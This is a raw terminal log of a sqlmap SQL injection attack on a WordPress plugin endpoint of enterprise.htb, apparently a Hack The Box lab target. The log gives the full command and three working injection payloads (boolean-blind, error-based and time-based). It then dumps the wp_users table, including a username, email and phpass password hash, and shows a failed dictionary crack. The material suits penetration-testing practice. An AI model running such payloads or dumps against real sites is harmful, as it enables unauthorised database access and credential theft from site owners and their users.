└─$ sqlmap -u enterprise.htb/wp-content/plugins/lcars/lcars_db.php?query=1 --batch -D wordpress -T wp_users --dump
        ___
       __H__                                                                                                                                                                                                                                                                                                                
 ___ ___[,]_____ ___ ___  {1.6.7#stable}                                                                                                                                                                                                                                                                                    
|_ -| . [,]     | .'| . |                                                                                                                                                                                                                                                                                                   
|___|_  ["]_|_|_|__,|  _|                                                                                                                                                                                                                                                                                                   
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                                                                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:54:00 /2022-12-27/

[21:54:00] [INFO] resuming back-end DBMS 'mysql' 
[21:54:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: query (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: query=(SELECT (CASE WHEN (1297=1297) THEN 1 ELSE (SELECT 5808 UNION SELECT 3400) END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: query=1 AND (SELECT 8946 FROM(SELECT COUNT(*),CONCAT(0x71787a7071,(SELECT (ELT(8946=8946,1))),0x716a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: query=1 AND (SELECT 5057 FROM (SELECT(SLEEP(5)))qmIa)
---
[21:54:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8 (jessie)
web application technology: Apache 2.4.10, PHP 5.6.31
back-end DBMS: MySQL >= 5.0
[21:54:00] [INFO] fetching columns for table 'wp_users' in database 'wordpress'
[21:54:01] [INFO] retrieved: 'ID'
[21:54:01] [INFO] retrieved: 'bigint(20) unsigned'
[21:54:01] [INFO] retrieved: 'user_login'
[21:54:01] [INFO] retrieved: 'varchar(60)'
[21:54:01] [INFO] retrieved: 'user_pass'
[21:54:02] [INFO] retrieved: 'varchar(255)'
[21:54:02] [INFO] retrieved: 'user_nicename'
[21:54:02] [INFO] retrieved: 'varchar(50)'
[21:54:02] [INFO] retrieved: 'user_email'
[21:54:02] [INFO] retrieved: 'varchar(100)'
[21:54:03] [INFO] retrieved: 'user_url'
[21:54:03] [INFO] retrieved: 'varchar(100)'
[21:54:03] [INFO] retrieved: 'user_registered'
[21:54:03] [INFO] retrieved: 'datetime'
[21:54:03] [INFO] retrieved: 'user_activation_key'
[21:54:03] [INFO] retrieved: 'varchar(255)'
[21:54:04] [INFO] retrieved: 'user_status'
[21:54:04] [INFO] retrieved: 'int(11)'
[21:54:04] [INFO] retrieved: 'display_name'
[21:54:04] [INFO] retrieved: 'varchar(250)'
[21:54:04] [INFO] fetching entries for table 'wp_users' in database 'wordpress'
[21:54:04] [INFO] retrieved: '1'
[21:54:05] [INFO] retrieved: 'william.riker'
[21:54:05] [INFO] retrieved: ''
[21:54:05] [INFO] retrieved: 'william.riker@enterprise.htb'
[21:54:05] [INFO] retrieved: 'william.riker'
[21:54:05] [INFO] retrieved: 'william-riker'
[21:54:05] [INFO] retrieved: '$P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2.'
[21:54:06] [INFO] retrieved: '2017-09-03 19:20:56'
[21:54:06] [INFO] retrieved: '0'
[21:54:06] [INFO] retrieved: ''
[21:54:06] [INFO] recognized possible password hashes in column 'user_pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[21:54:06] [INFO] using hash method 'phpass_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/smalldict.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[21:54:06] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[21:54:06] [INFO] starting dictionary-based cracking (phpass_passwd)
[21:54:06] [INFO] starting 2 processes 
[21:54:20] [WARNING] no clear password(s) found                                                                                                                                                                                                                                                                            
Database: wordpress
Table: wp_users
[1 entry]
+----+----------+------------------------------------+------------------------------+---------------+-------------+---------------+---------------+---------------------+---------------------+
| ID | user_url | user_pass                          | user_email                   | user_login    | user_status | display_name  | user_nicename | user_registered     | user_activation_key |
+----+----------+------------------------------------+------------------------------+---------------+-------------+---------------+---------------+---------------------+---------------------+
| 1  | <blank>  | $P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2. | william.riker@enterprise.htb | william.riker | 0           | william.riker | william-riker | 2017-09-03 19:20:56 | <blank>             |
+----+----------+------------------------------------+------------------------------+---------------+-------------+---------------+---------------+---------------------+---------------------+

[21:54:20] [INFO] table 'wordpress.wp_users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/enterprise.htb/dump/wordpress/wp_users.csv'
[21:54:20] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/enterprise.htb'

[*] ending @ 21:54:20 /2022-12-27/
